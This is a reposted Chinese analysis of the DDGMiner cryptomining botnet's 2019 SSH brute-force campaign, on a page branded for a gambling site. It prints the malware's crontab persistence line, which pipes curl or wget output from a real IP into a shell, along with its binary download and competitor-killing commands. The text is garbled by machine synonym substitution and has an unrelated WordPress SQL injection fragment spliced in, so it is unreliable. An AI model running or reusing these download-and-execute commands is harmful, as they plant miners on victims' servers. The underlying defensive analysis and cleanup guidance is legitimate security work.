小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

一、背景

腾讯平安专家在为某企业客户举行例行平安巡检历程当中,发明客户布置的腾讯御界高等要挟检测体系涌现了SSH效劳沦陷感知信息。在征得客户赞同后对客户机械举行长途取证,并连系御界的症结日记举行剖析,我们发明这是一同针对SSH效劳器弱口令爆破进击事宜,因为发明实时,工程师实时辅佐客户举行断绝及杀毒,并未形成丧失。

腾讯平安御见要挟情报中心对本次进击事宜睁开观察,效果发明,这是由大型挖矿僵尸收集DDGMiner提议的进击事宜。DDGMiner是最早于2017年被发明的挖矿僵尸收集,其特性为扫描进击 SSH效劳、Redis 数据库和OrientDB数据库等效劳器,并在攻下的效劳器上植入挖矿木马发掘门罗币赢利。从病毒效劳器的目次中last modified字段能够看到,本次进击中样本的更新时候为2019-08-29,目前为4004版本。

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

对样本举行剖析后,发明与此前版本差别的是,样本中新增了针对Nexus Repository Manager破绽、Supervisord破绽的应用进击代码,其进击流程大抵以下:

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

依据腾讯云鼎实验室监测数据,云上主机遭遇来自最新版本DDGMiner的进击流量从2019.08.29最先涌现,在8月30日抵达峰值,8月31日到9月1日下降到肯定局限以后趋于平稳。大部份进击流量被有用阻拦。而在少许沦陷主机中,90%以上遭到SSH弱口令爆破入侵,因而可知DDGMiner的重要流传体式格局依然为SSH爆破。腾讯平安提示企业用户务必运用高强度的SSH、Redis登录暗码,防止因设置不当而遭遇进击形成不必要的丧失。

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

二、详细剖析

黑客在经由历程弱口令爆破或破绽进击入侵后首先下载Shell剧本i.sh,并将其安装为crontab定时使命每15分钟实行一次。

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

然后检测是不是已存在历程nfosfa4,若存在则杀死历程并删除对应的文件,然后从效劳器下载ddgs.$(uname -m)保存为nfosfa4,个中uname –m用来猎取体系范例并映射到文件名。末了经由历程chmod +x给nfosfa4给予可实行权限,从而完成木马的下载更新。

ps auxf | grep -v grep | grep nfosfa4 || rm -rf nfosfa4
if [ ! -f "nfosfa4" ]; then
    curl -fsSL -m1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -o nfosfa4||wget -q -T1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -O nfosfa4
fi
chmod +x nfosfa4

接着查找并杀死多个汗青版本的病毒历程,历程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。

ps auxf | grep -v grep | grep nfosbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nfosbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nfosbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nfosbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nfosfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nfosfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nfosfa2 | awk '{print $2}' | xargs kill -9

然后启动病毒的最新版本nfosfa4,病毒被存放于以下四个目次之一。

/usr/bin/nfosfa4
/usr/libexec/nfosfa4
/usr/local/bin/nfosfa4
/tmp/nfosfa4

nfosfa4是采纳golang言语开辟,编译成基于Linux的ELF可实行文件,而且采纳UPX加壳庇护。golang言语是一款开源编程体系,其长处为简朴牢靠,支撑夸平台编译等。golang言语异常合适效劳器编程、分布式体系和数据库相干的收集编程,而DDGMiner正好相符这些特性。

为了便于剖析,我们经由历程Linux下的UPX脱壳东西举行脱壳,然后运用IDAGolangHelper剧本在IDA中对函数举行重命名。处置惩罚以后能够比较清楚的看到样本中破绽进击、挖矿、消灭挖矿竞品等功用。

在复原后的函数中,能够看到针对SSH爆破、以及针对Redis效劳器、Supervisord效劳器、Nexus Repository Manager效劳器的破绽应用进击代码。

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

多个WordPress插件SQL注入破绽剖析

背景 SQL注入漏洞是用来构建SQL查询的用户输入未经适当处理导致的漏洞。比如: 图1: 使用WordPress的SQL查询示例 从上面的代码来看,其中存在SQL注入攻击漏洞,因为从$_GET中提取的$_id在传递给SQL查询时没有经过任何处理。在最新的WordPress版本中,默认会在$_POST/$_GET/$_REQUEST/$_COOKIE中加入了magic quotes。这可以帮助WordPress维护,并提供最佳的安全能力。因此,上面的代码其实是没有漏洞的。 除了给所有输入值加斜杠(slash)外,WordPress会提供许多内置的处理函数来对输入进

样本还运用了hashicorp的go开源库memberlist来构建分布式收集,memberlist是用来治理分布式集群内节点发明、节点失效探测、节点列表的开源顺序(github: https://github.com/hashicorp/memberlist)。样本首次抵达受益机时,会猎取当地节点的地点和状况信息,然后尝试连接到内置的ip列表中的远端节点从而到场远端的集群。

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

memberlist应用被称为“疫情流传算法”的Gossip协定在僵尸收集集群中同步数据。Gossip 历程由种子节点提议,当一个种子节点有状况须要更新到收集中的其他节点时,它就会随机的挑选四周几个节点散布音讯,收到音讯的节点也会反复该历程,直至终究收集中一切的节点都收到了音讯。病毒经由历程这个历程将某个节点上取得更新的挖矿木马和进击剧本同步到一切节点。

 

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

末了,在挖矿功用部份,经由历程main_ptr_miner_Download函数下载,main_ptr_miner_Update更新,main_ptr_miner_CheckMd5校验矿机Md5值,以及经由历程main_ptr_miner_Run启动矿机,而且经由历程挪用main_ptr_miner_killOtherMiner对其他挖矿木马举行消灭。

小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器

三、平安发起

1、 运用高强度的Redis登陆暗码、SSH登陆暗码, 必要时增加防火墙划定规矩防止其他非信托泉源ip接见。

2、 实时修复Redis、Nexus Repository Manager、Supervisord效劳相干的高危破绽。

3、已中毒的linux效劳器可采纳以下手动清算计划。

a)、crontab假如假如包括以下内容,举行清算:

"*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh"

b)、/var/spool/cron/root文件,假如包括以下内容,举行清算:

"*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh"

c)、/var/spool/cron/crontabs/root文件,假如包括以下内容,举行清算:

"*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh"

d)、删除以下文件

/usr/bin/nfosfa4
/usr/libexec/nfosfa4
/usr/local/bin/nfosfa4
/tmp/nfosfa4
 
/usr/bin/betsbcc
/usr/libexec/betsbcc
/usr/local/bin/betsbcc
/tmp/betsbcc
 
/usr/bin/brhjbcc
/usr/libexec/brhjbcc
/usr/local/bin/brhjbcc
/tmp/brhjbcc

e)删除/tmp目次下文件

qW3xT, qW3xT.1, qW3xT.2, qW3xT.3, qW3xT.4,
ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016,
2t3ik, 2t3ik.m, 2t3ik.p, 2t3ik.s,
imWBR1, imWBR1.ig,
wnTKYg, wnTKYg.noaes,
fmt.3018

参考链接:

https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明小心:DDG挖矿僵尸收集应用SSH爆破进击Linux服务器
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址